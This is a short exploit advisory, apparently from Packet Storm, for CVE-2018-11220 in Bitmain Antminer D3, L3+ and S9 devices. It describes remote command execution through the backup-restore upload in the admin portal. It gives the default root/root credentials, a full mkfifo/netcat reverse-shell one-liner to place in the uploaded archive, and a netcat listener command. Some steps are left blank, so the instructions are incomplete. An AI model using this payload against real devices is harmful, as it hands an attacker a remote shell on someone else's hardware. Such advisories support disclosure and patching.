Bitmain Antminer D3/L3+/S9 Remote Command Execution

Type packetstorm
Reporter Corrado Liotta
Modified 2018-05-27T00:00:00


                                            `# Exploit Title: Bitmain Antminer D3, L3+, and S9 devices allow Remote Command Execution  
# Google Dork: N/A  
# Date: 27/05/2018  
# Exploit Author: Corrado Liotta  
# Vendor Homepage:  
# Software Link: N/A  
# Version: Antminer - D3, L3+, S9, and other  
# Tested on: Windows/Linux  
# CVE : CVE-2018-11220  
The software used by the miners produced by the bitmain (AntMiner) is  
affected by a vulnerability of remote code execution type, it is possible  
through the "Retore Backup" functionality of the administration portal to  
execute commands on the system. This would allow a malicious user with  
valid credentials to access the entire file system with administrative  
Login on Antminer Configuration Portal (Default Credential: root/root)  
1) Create a file named:  
2) insert inside:  
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc your_ip your_port  
3) Generate archive by inserting the file created before:  
4) Launch net cat and upload file:  
nc -vv -l -p port  
system --> upgrade --> upload archive